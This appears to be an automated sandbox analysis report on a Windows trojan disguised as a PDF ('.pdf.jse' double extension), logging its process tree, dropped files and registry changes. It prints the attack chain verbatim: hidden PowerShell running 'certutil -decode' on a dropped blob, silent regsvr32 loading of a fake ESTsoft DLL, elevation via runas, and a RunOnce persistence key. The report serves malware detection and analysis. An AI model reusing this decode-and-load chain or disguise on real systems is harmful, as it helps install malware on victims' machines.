--content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=78C7EE079D4F1A6B9C0BFB5504293DE7 --renderer-client-id=2 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job /prefetch:1Jump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BC6E485E39BA42C7D01E94B3E9769F20 --lang=en-US --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --enable-pinch --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BC6E485E39BA42C7D01E94B3E9769F20 --renderer-client-id=4 --mojo-platform-channel-handle=1848 --allow-no-sandbox-job /prefetch:1Jump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=747A9B4378C4A9B7BB34D82AEF8DC480 --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2Jump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=4DDA8CE3F3D37EB15CD09F11D5C7C42B --mojo-platform-channel-handle=2004 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2Jump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exeProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=gpu-process --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x8086 --gpu-device-id=0xbeef --gpu-driver-vendor='Google Inc.' --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file='C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log' --log-severity=disable --product-version='ReaderServices/19.8.20080 Chrome/64.0.3282.119' --service-request-channel-token=29BE366D42ABBCFC024ED1AE01B6F680 --mojo-platform-channel-handle=1828 --allow-no-sandbox-job --ignored=' --type=renderer ' /prefetch:2Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\system32\regsvr32.exe' /s C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.batJump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C5CF.tmp.batJump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runasJump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c262-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983D929A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,13_2_00007FF983D929A0
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D029A0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,19_2_00007FF983D029A0
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.5476Jump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9R6liubn_q4g208_484.tmpJump to behavior
        Source: classification engineClassification label: mal100.troj.evad.winJSE@49/82@1/1
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5732:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5460:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4152:120:WilError_01
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_01
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\ProgramData\temp\C011.tmp.bat
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeFile opened: C:\Windows\SysWOW64\Msftedit.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jseStatic file information: File size 28634023 > 1048576

        Data Obfuscation:

        barindex
        Suspicious powershell command line foundShow sources
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9a
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden certutil -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -windowstyle hidden regsvr32.exe /s C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runasJump to behavior
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe start-process regsvr32.exe -argumentlist '/s C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll' -verb runas
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DE3358 push rax; retf 13_2_00007FF983DE3359
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DE3318 push rax; retf 13_2_00007FF983DE3359
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DCDFD4 push rax; ret 13_2_00007FF983DCDFD5
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D53358 push rax; retf 19_2_00007FF983D53359
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D53318 push rax; retf 19_2_00007FF983D53359
        Source: C:\Windows\System32\regsvr32.exeCode function: 19_2_00007FF983D3DFD4 push rax; ret 19_2_00007FF983D3DFD5
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DABCCF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,ExitProcess,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_nor13_2_00007FF983DABCCF
        Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dll'
        Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jseString : entropy: 5.98, length: 28286394, content: "JVBERi0xLjQKJcO+CjEgMCBvYmo8PC9QYWdlcyA4NSAwIFIgL091dGxpbmVzIDE3IDAgUiAvVHlwZSAvQ2F0YWxvZz4+CmVuZG9Go to definition
        Source: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jseString : entropy: 5.61, length: 345890, content: "VFZxUUFBTUFBQUFFQUFBQS8vOEFBTGdBQUFBQUFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFGo to definition
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1
        Source: initial sampleStatic PE information: section name: UPX0
        Source: initial sampleStatic PE information: section name: UPX1
        Source: C:\Windows\System32\certutil.exeFile created: C:\ProgramData\glK7UwV.pR9aJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeFile created: C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dllJump to dropped file
        Source: C:\Windows\System32\certutil.exeFile created: C:\ProgramData\glK7UwV.pR9aJump to dropped file
        Source: C:\Windows\System32\certutil.exeFile created: C:\ProgramData\glK7UwV.pR9aJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeFile created: C:\ProgramData\Software\ESTsoft\Common\ESTCommon.dllJump to dropped file
        Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdateJump to behavior
        Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdateJump to behavior
        Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdateJump to behavior
        Source: C:\Windows\System32\regsvr32.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce ESTsoftAutoUpdateJump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Uses an obfuscated file name to hide its real file extension (double extension)Show sources
        Source: Possible double extension: pdf.jseStatic PE information: x110bx116cx1100x116dx1107x116e x1100x1161x1111x1161x11ab 2021-05-07.pdf.jse
        Uses certutil -decodeShow sources
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9a
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\system32\certutil.exe' -decode C:\Windows\..\ProgramData\efVo8cq.sIhn C:\Windows\..\ProgramData\glK7UwV.pR9aJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 13_2_00007FF983DABCCF LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,ExitProcess,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_nor13_2_00007FF983DABCCF
        Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
